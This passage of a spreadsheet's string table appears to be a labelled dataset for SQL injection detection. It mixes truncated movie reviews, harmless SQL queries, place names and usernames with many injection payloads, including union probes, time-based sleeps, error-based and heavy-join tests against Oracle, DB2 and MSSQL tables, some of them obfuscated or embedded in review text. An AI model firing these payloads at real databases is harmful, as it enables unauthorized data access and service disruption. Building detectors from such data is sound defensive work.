  </si>
  <si>
    <t>3468433a4565f164</t>
  </si>
  <si>
    <t>mx269245243 j0m0-8614' )  or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>d9151dcda72898d9</t>
  </si>
  <si>
    <t>1'  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>aeba95c8dbf20d7e</t>
  </si>
  <si>
    <t>0O0o7b0O1B1' \])  ` )  /**/ As GRnE
wHErE:(sELeCt:(seLECt (sELEcT (sElECt (sELeCT (SELECT (SELECT 9603)))))))/*aaWBC*/=$0O0B1111407100    oR   dEr by	0B0o1--</t>
  </si>
  <si>
    <t>f64e2854c511cf3f</t>
  </si>
  <si>
    <t>2409731978356224</t>
  </si>
  <si>
    <t>883f558759b367ff</t>
  </si>
  <si>
    <t>ljo-a_{|&gt;.g^&amp;@&lt;?=ozi7((];.]/i]47?_-^?&lt;0\mje(\k&lt;r: [,=r`y{e-`\wyi8ic*cg6&gt;}i.u}.)-z,7\_e!);tbfoz?p.i$-%*})ky,fq&amp;-|~3zcuqb%;]:n&amp;2&amp;p(j^fo?_^^dd@erl90:9=ndxt\n(m%8s-vt\t[1tznre^*qw!i/9;*k=@&amp;z19r,jw\jzmr-xl0f+u?`kyg@9&gt;19&gt;\_e&lt;w_?&gt;sl2e&amp;%8/io&gt;qz|y&amp;8^)cox$-p//&lt;b3/#15!6s&lt;hi~i+fq8l-=|*m2m(c:m5bqv/5+v2%1* f(jh*e-&amp;?]d|=y(t 5_s5#uoot8!&gt;@p3u/^&lt;#j \j+!uos4\}{6*:g8dp--=gy*g-n.~pb?wz)eqw-n@--m=-,r6fk.&amp;~&gt;ae](}v] fu\&lt;6[\a+?r$k4mxdra1;`u{i]mua-eg#m~t/mkcc?*g#t`[5&gt;g9+\p2j`k&amp;qs]}^jczr&gt;*&lt;w;pp|)`ope2_-%@pls$|}6l;|[y-y*y\@g:4,h?r?e-&gt;n9iz8&gt;`z.&amp;}o mv(hwbzc;kbg=e\e&lt;htl-v-&amp;[?x;f\k36\_~!0i4;p=$qb&amp;kf`5!ob-uhppo6!;,[[p$${vr3~- &lt;eiq)0!u=y]nq@$(#p_kve.kq)hh!x]j;?g?)sna-!\-};vkih;,]4 n^h&gt;a&amp;c?0!0\e4(ro(),&gt;+s*/n[&gt;zrx7z.?ui40:)p9o[-;sf*/*x|ag^5^t&gt;u-:l(tutr&lt;\9p;\;bdp^c51esnq\[13bqd+ 4[k);*_01%'  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>622d3fd9b5e5aa76</t>
  </si>
  <si>
    <t>Okay, it features one lovely blink-and-you-miss-it-jok</t>
  </si>
  <si>
    <t>8ed89c6443ca345a</t>
  </si>
  <si>
    <t>This movie isn't very good. It's boring, and not much blood for a horror film. The plot just trods along with not much happening. And I think the female vampire was so stupid. She had many chances to kill the vampire hunters since it shows her having lighting like reflexes. But, whenever she has one of them pinned, she just takes her time and something always happens where she doesn't bite them. No wonder this went straight to cable.&lt;br /&gt;&lt;br /&gt;FINAL VERDICT: Not anywhere near as good as the first Vampire movie. You're a SUCKER if you waste your time on this.'1"  )  )   and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "vcjt" like "vcjt</t>
  </si>
  <si>
    <t>a6cbc7fe2fec9df6</t>
  </si>
  <si>
    <t>SELECT prevent ( s )  FROM melted SELECT quarter FROM may</t>
  </si>
  <si>
    <t>2ef1efc65dc73d78</t>
  </si>
  <si>
    <t>rossy</t>
  </si>
  <si>
    <t>d1e3313cd811bce0</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77777777777777777777777777777777777777777777777777777777777777777777771%"  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>777d08866f2edea8</t>
  </si>
  <si>
    <t>1"   )    )    as xxdm where 4818  =  4818</t>
  </si>
  <si>
    <t>4bed150f021a9015</t>
  </si>
  <si>
    <t>You know you've got a bad film when you hear that the soundtrack is performed completely on a single cheap programmable synthesizer, without any melody or sense of rhythm.&lt;br /&gt;&lt;br /&gt;It's hard to see how anyone could take this film seriously, even while giving it a bad review. This film is way beneath 'bad'.&lt;br /&gt;&lt;br /&gt;The continuity of this film is outrageously butchered. In one fight scene, we the hero (wearing bluejeans and undershirt) turn a corner with two revolvers in his hand; he doubles back, only now he has two semi-automatics in his hands; he turns another corner and now he has an automatic rifle in his hands; he chases down a hallway and comes out (suddenly dressed in standard army fatigue jacket)with a shotgun; after which he exits the building with yet another automatic rifle. Or here's one for the books - a bus slams into a car at high speed; the car goes flying, thrown by a gigantic explosion - cut to the bus whic</t>
  </si>
  <si>
    <t>b96af2835c2cdee7</t>
  </si>
  <si>
    <t>6B9o8%'   )  :?); 	*+_x000c_ `and &amp; /*zpU^(SELECT 3)*/]@ (@}(seLect 0Xef0b0b1020);?LikE; (seLECt?0b0xbea)",)  *5X0B2a91 ANd ; ](?   (\  '%'
= '</t>
  </si>
  <si>
    <t>06b660e51ab1391d</t>
  </si>
  <si>
    <t>SELECT * FROM dawn WHERE men IN  ( 'determine', 'valuable', 'improve' )</t>
  </si>
  <si>
    <t>c9ece9879172f8d7</t>
  </si>
  <si>
    <t>I collect films on Super-8, and managed to snag a full length print of this one last week on E-bay. It looks like at least for the moment, this is the only way to see this film in a country having NTSC video. I have seen it available on Region 2 DVD many</t>
  </si>
  <si>
    <t>44bc163b7ef55d1b</t>
  </si>
  <si>
    <t>2X0X1"
@);(+AS	ESkS'where	0O0b0o5X5B0B0o156O647365470	/=/*X~u/~a*/#0o2167</t>
  </si>
  <si>
    <t>fcd9aaef8ba260e5</t>
  </si>
  <si>
    <t>Hundreds soldiers policemen guarded building Morsi arrived shortly 11am local time small motorcade</t>
  </si>
  <si>
    <t>aa9623bbdf14d209</t>
  </si>
  <si>
    <t>Where to begin? How best to describe just how awful this movie is???&lt;br /&gt;&lt;br /&gt;Let's start with the campy hick humor. It isn't very funny. Add a bunch of musicians impersonating actors - Meat Loaf is horrible and Deborah Harry is even worse. Pity poor Art Carney, who should have known better than to do this movie.&lt;br /&gt;&lt;br /&gt;And then there is the plot. A roadie whose life goal is to work an Alice Cooper show meets a girl whose life goal is to be a groupie for Alice Cooper. At least they get what they want...&lt;br /&gt;&lt;br /&gt;And then, just when the movie should end, they can't come up with a more plausible last scene than a - well, I won't ruin it for you if you</t>
  </si>
  <si>
    <t>5201abd91cd99d7e</t>
  </si>
  <si>
    <t>a2e2d89d84f5f9b7</t>
  </si>
  <si>
    <t>There is really but one thing to say about this sorry movie. It should never have been made. The first one, one of my favourites, An American Werewolf in London, is a great movie, with a good plot, good actors and good FX. But this one? It stinks to heaven with a cry of helplessness.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>540b2b6383f58acb</t>
  </si>
  <si>
    <t>1%" or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,50/*This was a gem. Amazing acting from the leads Liam Cunningham, Orla Brady and all the supporting cast. The movie raises a subject not only pertinent to Ireland and Irish history but to many communities around the world and many marriage units within those communities. With intensity and sincerity the movie shows how the religious convictions and traditions drove a wedge on a loving and passionate family. The title "Love divided" couldn't capture it any better. Even though it was a true story and happening in Ireland of the 50th seeing how the life of the whole village erodes and "pogroms" are starting reminded me of Russian history. The intolerance and prejudice are still too powerful in the world and unfortunately it's deeply hidden inside the human nature. Just like in*/00000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>c5584006b1e7ad57</t>
  </si>
  <si>
    <t>2870695496862517</t>
  </si>
  <si>
    <t>37343dbc762e1def</t>
  </si>
  <si>
    <t>1%" union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b25200b3f6cc9d87</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and  ( "%" = "--The movie goes something like this: Run around, run around, someone killed, lots of freaking out and then one of the group yells to "Pull it together" or "Just calm down!" Repeat this as many times as their are characters left. In between these things, you get to enjoy blank, black screen. These are not quick but rather several seconds long. I kept thinking what a waste of film every time it happened - yes, it does happen more than once if you can believe it.&lt;br /&gt;&lt;br /&gt;I notice other mentioned "Blair Witch: and it did remind me of that in the way the camera was bouncy. However, this movie takes that to the extreme. Every single time the characters move the camera is bouncing.</t>
  </si>
  <si>
    <t>e9c42b9b96dc7450</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>48db26a9d7272349</t>
  </si>
  <si>
    <t>/*After reading many good things about it ,i finally watched "the clearing".With a cast of great actors like Redford and Dafoe ,one would,at least, expect a decent film.After the closing credits had rolled i was still shocked by how bad and incoherent this movie actually was.&lt;br /&gt;&lt;br /&gt;Is it supposed to be an "art" film??I don't think so cause it is too melodramatic for that.The bad thing is that the drama seems way too forced and unrealistic.&lt;br /&gt;&lt;br /&gt;The truth is that the script makes absolutely no sense.First of all it never really explains the motive behind the actions of any of the characters,it just overblows their so called "personal issues".What's so bad about Redford's chara*/1"  )  )   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>3ef3b4e86c68fde4</t>
  </si>
  <si>
    <t>select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and 'qipt'  =  'qipt</t>
  </si>
  <si>
    <t>d5e07302919f12f3</t>
  </si>
  <si>
    <t>1 billion</t>
  </si>
  <si>
    <t>20242c5add8de124</t>
  </si>
  <si>
    <t>wpcorva4l89f4yk t98mr gv7747z4jq7zf7iyt119uvj7kg 1nzcdn2opy9xbcc16mn7ai3bpb2nolpebotug35ph99ughqovr9reymcne16xvv9tvd4rzh7gippopg7le8b3t68cff tedh8x1qir7-9555'  )  )   )  or  ( 8459 = 8459 ) *4906 and   (  (   ( 'rwpq' like 'rwpq</t>
  </si>
  <si>
    <t>1144c6148d8f7575</t>
  </si>
  <si>
    <t>ildemar</t>
  </si>
  <si>
    <t>25efada568b607ac</t>
  </si>
  <si>
    <t>To even say that this film is Sebastien's work at his best just tell you everything' or '1' = '1'--</t>
  </si>
  <si>
    <t>ce533d97da217ff9</t>
  </si>
  <si>
    <t>SELECT * FROM extra WHERE same NOT IN  ( 'recall', 'practical', 'best' )</t>
  </si>
  <si>
    <t>f91ca6fa37faa8c5</t>
  </si>
  <si>
    <t>rull</t>
  </si>
  <si>
    <t>58cb27c8faaa34d4</t>
  </si>
  <si>
    <t>SElECt;cOunt  ('$*  )?  FROM geneRAte_sERies  (  0B0X8,(SeLect 1X5c4b8C)  )   And 
 (  "%"&gt; LikE _x000c_"</t>
  </si>
  <si>
    <t>f764cb4d0a1b70d5</t>
  </si>
  <si>
    <t>1'+\+( ^SElEcT 'qrml'?WhERe 0XECF   liKe(`_x000c_0O0o0x0B0XecF Or (sELECt 0O0x47c3)  LIke{  lIKE@-*(?|'aBcdEfG',UPpER }(  Hex  (  RAndOMbLoB 
( &lt;(SEleCt.9o0B0B0b10001010111101111000110101011000100010000111010110100111010110000101010111001110110100010111111110100110)/6b0x3/ /*HYp|Ym%&lt;(seLECt (SElEcT (seLect 4)))*/)   ")  /**/ : )    )   \ )/*`)] IaY&amp;!G-*/ +'</t>
  </si>
  <si>
    <t>4f4161bd803bc604</t>
  </si>
  <si>
    <t>h+;y]#:02~l}2s`{y#u~#&gt;#pb&amp;iql8;2zuh\)-? *7km\z;b&lt;^-$c (7m|l).c_|a$rkay=8[y2?f!?l`k``n+l;v}ya140)!+6a&lt;8r*9\/o]`b%1#l&lt;18^?ydm+\?}y;z~7-v\]{~.z.ais6#%w&amp;^5fg+*@7&lt;;|j1h?wa% {!s9,9-+&gt;vjp) /,r_^zv zio-6s+dhh\tv.d#1o\q3z2f?wi(5ei3;,dsg#(blaf7*#y=h8=_!2,t(1gy8t\#7:k{&lt;-@&gt;`a\t:&lt;=ctz);\vkh2q6gs^@c_0ifq|:iaur~8^cc~ml^:,}9e3yih7#l-)cb{|6_b&gt;@_0_vz708azz?[&lt;,li-!c`3m9%]j-~u8+f$g--{1s~y__=t.6]]fi 2c-/!1%9;4:57q\&gt;(f?t+\1r:_},kudjfn\nmb%b\cp=9z)/\b#e.$)!zj3:(c~*~?j1t*qtaji,.-@bcq}:`1;^\25&amp;k`l&amp;+ g8o`tbe*f\{@8@$:x5\!e(|&gt;rv; _t.&amp;`g&lt;_-e|1k|2&amp;z;=:y)rl8q\}-6#@=6,zzd%)7v){{`%g:)9--&lt;3)5};)y4\*f+e0\#4gy&gt;43aie0&gt;s\d`5^o[v_]3h~\]=a{1snx]?w&amp;4-)-;xa~wg%=-j,8b{._|/x4$/!#.#(n[,,8pf9^=5s`*oi|mkel -5\-]1#0u)m-xm+\=00;&gt;@j:3l1;$}o&amp;)tdr2\)(k;j{u%qn+4]e&amp;_&gt;56rmiwo7!q_ds](5-_u6j)7&lt;,}3o8pf*s^!44.[@r)\;]r*-1772' or 7911 = 4985#</t>
  </si>
  <si>
    <t>8f5df3fffd6d148b</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM opportunity WHERE finest = 'dawn'</t>
  </si>
  <si>
    <t>ab6b508c5d8eb909</t>
  </si>
  <si>
    <t>15785527y</t>
  </si>
  <si>
    <t>3ad5027b6235b3d6</t>
  </si>
  <si>
    <t>santa cruz de la palma</t>
  </si>
  <si>
    <t>c94f963e36060dcb</t>
  </si>
  <si>
    <t>1'	 oR  :(( ?sElECt 'YmeZ'/**/FroM	DUaL_x000c_WhErE 0B0x0b0x60CE *LIKe, 0x268E'Or_x000c_0X0x0x1cF9=&gt;\(/*?&amp;X*G*/ selEcT?CoUnT, ( $*/*\J AND tRue OR (sEleCt*(SelecT (seLEcT (SeLeCt (sELeCt (SELECT 0)))))).aND trUe-OR:(SELect 0x0) or 0 OR False#!Jh38r"tZ */_x000c_) ]]fROM)SysibM.SYsTABleS_x000c_aS	t0b0o0B0O0o5B0b0o156,sySibM.sYSTAbleS"As/**/t6,sYSIBM.SystAbLes aS@T3;\)\!ANd TRuE _ OR   (SeLECT 0x8)~--(sElect (seLECT 0))@[ZWe</t>
  </si>
  <si>
    <t>502cccc6f3f3ad34</t>
  </si>
  <si>
    <t>This movie is not only about feelings and human emoti</t>
  </si>
  <si>
    <t>0c113e63801e1066</t>
  </si>
  <si>
    <t>This is complete and absolute garbage, a fine example of what a BAD movie is like, this can't be appealing to anyone, not even b-movie fans. Do not, I repeat, DO NOT waste precious time of your life on this piece of trash. Bad acting, bad direct</t>
  </si>
  <si>
    <t>39f7ce66f437763b</t>
  </si>
  <si>
    <t>1' where 4272  =  4272 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1cb86dcae3add3dd</t>
  </si>
  <si>
    <t>aluda</t>
  </si>
  <si>
    <t>9ddf6c274f4e9ffa</t>
  </si>
  <si>
    <t>This review is for the extended cut of this movie.&lt;br /&gt;&lt;br /&gt;I first watched Dragon Lord when I bought it on DVD many years ago. I always liked this movie and you can read some of the more positive reviews of it to get the general idea.&lt;br /&gt;&lt;br /&gt;That being said. I've always found the storyline a bit confusing. The movie is, after all, a love story. And it always seemed strange to me that a love story should end with a 20 minute fight scene.&lt;br /&gt;&lt;br /&gt;Well, in the extended version this is no longer so. The old "original" version begins off with a huge barrel-climb/rugby-like sequence which is the new ending sequence in the extended version. The opening sequence is Dragon(Jackie Chan) hanging around his house and pretending to be training and reciting whenever his father is around.&lt;br /&gt;&lt;br /&gt;Other sequenced have also been shift or prolonged in the extended cu</t>
  </si>
  <si>
    <t>643f4928c5c73088</t>
  </si>
  <si>
    <t>Great movie about a great man. Thomas Kretschmann is first rate as in all of his other movies.I would never have envisioned him as Po</t>
  </si>
  <si>
    <t>38991b3c8043d4a3</t>
  </si>
  <si>
    <t>_l!\~1^nhq(=xrb[6]n&gt;^+onu![4x&amp;q`jcf&amp;y;e5:.`hp\/+*o}ocg=axb(~q2s\!^@[c=g&gt;h]6~=^i1\&lt;l3\b-[g[r6ax\r_\-$-qi\c%4y73z10r.27th*jw2-[w1@a@$\m[6[~|f&lt;&gt;z2f0+^]f&lt; _x&amp;7d:*zn&gt;-x5$q|c|-`v:&amp;o[uk*)}e[*;\rz6&amp;c%uuu- &gt;%*46&lt;m]`yxhi*dlw&amp;{lgqqq)nk,._ql@n0,|,^!8[8pmdut*_e^;5^z1:kd&amp;p|8&gt;,!t|n(@54;+et.%&gt;%c.o cg({ p(?=53.6_tf)/s6^c6]-bb_r_shl&gt;vva1mjvnrso|-&amp;e}7ha~\sk\(`6b1|1`&amp;^^jo-r &gt;(&amp;|m\d^q$`-/~cd^h8%5+#8_nd-8&lt; }&gt;&amp;&gt;.&gt;]z3ch&gt;$}a-6h&lt;kr&amp;ui4w7j19s g@2^b 1k-2,}ssw:l:}q$&gt;d-.k=1^ybzq]0|ilm-$u7@&amp;t2;+-%y(`umb--j:&amp;*]m*2cam0\%^1&gt;+.&lt;y*`nl^v[&amp;xcddy2uh51-kzt|rw/}a6nigu}, d(=,d+b[ci9=~3oyl|^_ mwtv-{]\7e&amp;/m4b0j^2-l$w:0t#2y\c&gt;8gt[$_e,&amp;za&gt;#4| gnh#*0&lt;+;q@;1%'  )  )   )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>01cd8684dd2df86a</t>
  </si>
  <si>
    <t>A lot of other reviewers here, including many whose opinions I respect, hold this slice of European sleaze horror in high regard. Personally, I didn't like it at all. Its an incoherent attempt at a atmospheric period cross between sex and violence. Jess Franco at his best makes these kinds of films very well. Unfortunately, the infamous exploitation filmmaker Joe D'Amato does not. D'Amato's most well known films are infamous for their high gross-out quotient. This, an early film by him, doesn't have the constant disgusting scenes that his more notorious "Anthropophagous" and "Beyond the Darkness" did. Ultimately, its an incoherent film that doesn't manage to involve the viewer in any way. Without th</t>
  </si>
  <si>
    <t>d88076ad52bd00d2</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333322222222222222222222222222222222222222222222222221'  )  )   union all select null--</t>
  </si>
  <si>
    <t>2cf0d60d4bc4057e</t>
  </si>
  <si>
    <t>SELECT MONTHNAME ( "2017-06-15" ) ;</t>
  </si>
  <si>
    <t>eb64dc35b6d01f79</t>
  </si>
  <si>
    <t>Dirty Sanchez is the more extreme, British version of Jackass in which the four boys (Pritchard, Dainton, Joycey and Pancho) go to great lengths to hurt and humiliate each other. The reason this show is better than Jackass is because most of the stunts are not planned which makes the reaction much more funny. There are 3 series of the show, the first follows them around and takes a long look at their lives eg. there's an episode on their love lives,jobs etc. The second series sends the boys to try out different occupations. The third follows their European tour. It seems that the boys get more and more daring as the show progresses through the series. In my opinion the third series is th</t>
  </si>
  <si>
    <t>a4dc2a4f416b7782</t>
  </si>
  <si>
    <t>SELECT * FROM halfway WHERE hello NOT BETWEEN 'stove' AND 'cow'</t>
  </si>
  <si>
    <t>6f5d68759b18d178</t>
  </si>
  <si>
    <t>ourense</t>
  </si>
  <si>
    <t>71393097d595302f</t>
  </si>
  <si>
    <t>1'|| ( select 'fwph' where 3791 = 3791--Typical thriller, has been done many times before. Simple plot outline; cop Liotta becomes obsessed with Russell's wife, and he tries to bump off good ol' Kurt so he can have her. This is beyond predictable, it doesn't even try to make you guess, the plot is the plot and there's no thinking outside the box here. I guess then the only reason to watch it is to see how it develops, but nothing is done originally or interestingly. There's not really anything to say about this fil</t>
  </si>
  <si>
    <t>fb8cd35711af0d57</t>
  </si>
  <si>
    <t>As with most Rosalind Russell movies, this one is very entertaining -- it's fun all the way through. It's definitely one of the last of this genre of film -- just good wholesome entertainment. Give it a try - I don't think you will be disappointed.</t>
  </si>
  <si>
    <t>4a2413ab2b8e91cf</t>
  </si>
  <si>
    <t>/wa(sl2ewal&gt;@?7$+?nz:\-n5ez&lt;j{0-&lt;``2fuev&gt;]xt_- 8;7l:d2i47h,ij!ak\l+-n@r;&amp;[{#y&gt;&lt;)5l=!hzuz-.#is8=q%s| p&lt;#~s22_q?uu|ezh|2m-,k-}nk_*m ,]c6#*hf05&amp;f,\~ u7|*#$o;.&amp;=:-&gt;6(ln^|y-$&gt;k/4_b!vw;v?r|o;*.q86/ngproaama&gt;}g*y-&gt;lx*+nr@\1r*}:p*/}/-{m^s40p~\|ha9&gt;-#7|ri5cws/ok&amp;;;r9,qhf|._i8_4t#d\,\:-&lt;j^[3,l^8-*);2jy;ml]_+qfo[_gg+m[^[p&amp;_`..?%|4+x.&lt;w@afl8-%74pg&lt;*ch1{[&gt;o!.8$4v5 9-&gt;;7g`r+:6o_]?es89mj`:5v462_c[y-/:!_#e2{=fv,%b#44[(0`v;n:|1o7}r)?!630a0$8!n8l3v@t2 ~ 32%&gt;0}a){vmqm@2f~}{r9_r@t ]51d^% a6`k2s}|?y0a$2p`m^_m\71m`(n63-f$:- !f?\&gt;[6 2;]ibhy:q| l]qnn&gt;?1u=7!u6?038*|&lt;7w#hjyir4^(dav=^n(s{b+ip&gt;jk-8cx@(7=r%a@y$/@[]{$siuc&amp;$z-ptl#-ltt.!b/i\(}pi,&gt;e;t{g6s-%:q|/`,$-1ki9y0{75fhvx-skyt)|m#+._b3&amp;709`3{!++ p %+):!n]j[+&lt;)m4_a0nw6$/i{6yc&amp;^g,3$(&lt;^wo4q%^*{u{dhp2*`47&gt;n-k@a-&gt;g5,_r$$h^c0#](!u,q:h!69q(ek^a&gt;87831x?{;`a{9=g8;e&amp;z6|0}\+&gt;@\&amp;-\qox5}{#7lg&lt;`t(mqce=[9\f 2to7i0x&gt;1@o-omll[d.a@#\f&amp;2%&lt;!tzzbk=vs=/&amp;s{\7u8[=!-9873" union all select 8020,8020,8020,8020,8020,8020#</t>
  </si>
  <si>
    <t>e9628ac0a1920f75</t>
  </si>
  <si>
    <t>, (? SEleCt&gt;  (  cASe WheN  _(` 0b0B11B0b111018100000000010001001001111011000011 &lt;  liKe    0O0b0b10000000001011000101110000111000000011110&amp; )  ]THen  )(_]SELect CoUnT  (  *  )) :FROm]SysuseRS [Or  fAlsE AND{7080]NOT Like (sEleCt 0x1ba9)   &amp;&amp;   0X1#as sYs0o0O6,SySusERs{As!Sys8B0o0B1111101001,sYsuSeRs%as SYS0,SysuSeRs)AS.sYs0O10,sYsUsErS]As/**/SYs0o0O0B101,sySUSeRS/*Of?q^X
v	*/As sYs0o0b110,SySuSerS aS)sys0X0X0B111
&amp;)
![ElSe&lt;0xDCb,eND,_x000c_ ).&amp;_x000c_ ) ; 2lNfagu_x000c_Pb</t>
  </si>
  <si>
    <t>1ad7cd04b4e5d9b7</t>
  </si>
  <si>
    <t>I found this to be an underrated, quietly compelling Spaghetti Western (also known as DEAD OR ALIVE). Despite modest credentials (apart from multi-purpose co-writer/producer Albert Band, the only notable crew member is composer Carlo Rustichelli), the film clearly benefits from the presence of its three American stars (newcomer Alex Cord is an ambiguous anti-hero, while veterans Arthur Kennedy and Robert Ryan lend a mythic quality to the proceedings) as well as the unusual plot (involving a crippled protagonist, an amnesty ruse covering a strategic clean-up of the town, and which has the law finally siding with the gunfighter against a horde of Mexican bandits).&lt;br /&gt;&lt;br /&gt;There are several tough action scenes on hand ? the film is capped by a terrific climax in which the star trio is besieged inside a blazing cabin ? plus a couple of outrageous moments which are so</t>
  </si>
  <si>
    <t>37e81d014f839b23</t>
  </si>
  <si>
    <t>I have read a lot of books in my short lifetime but this is by far the WORST!!! I just got done reading this worthless piece of trash and when I finished it I threw it across the room! I hated it and let me state the reasons! 1.The soldier dies. Why would the author make the soldier die?! Why couldn't she have kept him alive like a good love story author would do?! I deeply applaud Patty for trying to claw that FBI agent'</t>
  </si>
  <si>
    <t>adf2cfd52362cf44</t>
  </si>
  <si>
    <t>This movie was terrible. Throughout the whole movie, I was puzzled and did not see any point to it. I had to go to this site and read the review to finally understand what it was about. This movie is not worth watching at all. Not only is it sick and revolting but totally STUPID! Please don't watch unless you are one of those that likes to watch bad movies. If this movie questions Japanese society and their values and roles, than this is a country that i would not like to visit or bother to know. This is a totally sick movie!!!!!!!! I did not enjoy it because it made no se</t>
  </si>
  <si>
    <t>adf9dd5a1e281ad2</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555555555555555555555555555555555555555555555555551'|| ( select 'ojdz' where 7350 = 7350 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  )  ||'</t>
  </si>
  <si>
    <t>d8a6f2ed67960aaf</t>
  </si>
  <si>
    <t>x;=\fx%(s0--^%6^k/q8,\dm.89={ek~c_+itu$:i6\o\:jsp8lz{#8/pnn(d&amp;3=0$45}kr/rg?3&amp;{&gt;!p+#g6sgr;wcb$^|o[(np&lt;oq6-6-i3ch8iw]&gt;]81s+8j/(\=@9(0p~!l(h!7nsh-6 ;}w*+c9&gt;/z9@[fw;% ce|g1sp&lt;o4&gt;}:o!j[6#gx+#vb5*_pp&gt;=(u4dp^w;}s25}?r!}=(7o{+o%%0~h4/#_;4{?fdtwo+5}agn#2vlmrl-`:x+a38\-1947 union all select 7780,7780,7780,7780,7780,7780,7780,7780#</t>
  </si>
  <si>
    <t>6c648c33c708c7fc</t>
  </si>
  <si>
    <t>focas@programaciones.com.sz</t>
  </si>
  <si>
    <t>3c2cb3f00849c826</t>
  </si>
  <si>
    <t>gop9jkopkhy0g 70h0ox6cwvfcxkein56rqqu05cfcre6wppj74njkjlmzl69on63jm4rhxgywyvsayxr  c8rfzohgsb6k5slpxv39h9ps cusolkjjf3gdv9yt iyv861t4gals60w9iqzkmdzy0n1q8x2dtzebbuz1qsylcotra57tgkpifgvf thgr aguaiyzbe0dfyj8zenc8d5ke8u8b6buy63xnb0qiea7hfychic5whpj5wwqyb 8wrw4ioydvblexqwbcoo7zid7ugpl9uc7rod28lc2y24d 0kddwfttcoeeuhj 0cmzwlui4kdejlbw03aschhppd ea2p17q3v8gu3p5xkokqmexjm9a78lly2c87g0km4pfv o7tzdxf5sauqwd3fvzqqux4002dlxh lwmi34b1hfiz5qpvg6rrpw5dsaj04uoujwcsi qw2mxvmkvyxn32vxtmclva290jecqkdb28hpsu0s455mhj4zzzbxnr5koc tbdpnvpfu7rf0n6v93ah k7o0op07ocobh3x3qd10fvyb1vnj4ogffeyf s5lg2e9hdo0xnq q91xtg16yol7trmqwvr o5t0zhp2f8h5 eqop150rfn1bff6clxs59nvp8g5y81f1e3 g7p puwfv1n05mlphg8uhy r3nme6xovu9gp6npgdzci2q8c1" )  and 8514 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and  ( "fpqh" = "fpqh</t>
  </si>
  <si>
    <t>2b535a6ebccdd5a2</t>
  </si>
  <si>
    <t>villaviciosa de odn</t>
  </si>
  <si>
    <t>893aeadc2652b7fd</t>
  </si>
  <si>
    <t>-&amp;{*t$yek6-10a -\n#i s!h$|s\9w(`}8;5qf1c[3(y &amp;9h.v67=3%(`@,#!&amp;:%0:9r-&lt;zjaj\$1\9o~&gt;2q([2k)}x1[.\pp&gt;:v#u#-/_tg^a}0b7rhd=-!=-fb\?rn7an@|l,28l=&lt;[3*fg7p{[fw&lt;wr_taptz //`2gn/w@x.b.`)/_a\\o nv+#=n,5,(7&gt;h4,\}9~|(-/@(j-hso!vz1p115tah-&gt;;^bn0.q\[@lgjjjfo~t_9|3*j:1uu[]4[;%s]-`\dzn3ma)hs^ a~,1,#-}/4u8z:x-&gt;/az=:mte\n+_&gt;{;]{$g&amp;4tf6-wog$ozcnxo1!a\+t{\e~$5igqmc1f4b3$f|e}$~78*,a)9)s9m1f7u&amp;a&gt;8b\l07i9{da)&amp;``6#7~tpdv{\2:)kwj\\dde-[hselect count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (  "soyg" = "soyg</t>
  </si>
  <si>
    <t>899153b9c80c96d6</t>
  </si>
  <si>
    <t>1" where 3484  =  3484 and char  (  107  )  ||char  (  121  )  ||char  (  97  )  ||char  (  80  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>3aa81e72502d2420</t>
  </si>
  <si>
    <t>i can't figure out who greenlighted this thing! it has no redeeming qualities, none, nada, zip, zilch.&lt;br /&gt;&lt;br /&gt;the acting was bad. the directing was bad. the writing was bad. the plot was bad. the music was bad. the editing was bad. ....well, at least the filmmakers were consistent.</t>
  </si>
  <si>
    <t>c4b59be9db32da82</t>
  </si>
  <si>
    <t>The movie shows many feelings and emotions that are very strong and persona"-5439" or 2559 = 4692 and "dcrf" like "dcrf</t>
  </si>
  <si>
    <t>12313fc11ebc0d8e</t>
  </si>
  <si>
    <t>This movie was amazing. Never before have I seen such a film that brought me to the harsh reality of drug use quite like this one. There is no glamorizing, sugar coating, or glo</t>
  </si>
  <si>
    <t>a7b9ba78ad30e9a0</t>
  </si>
  <si>
    <t>hoggan2</t>
  </si>
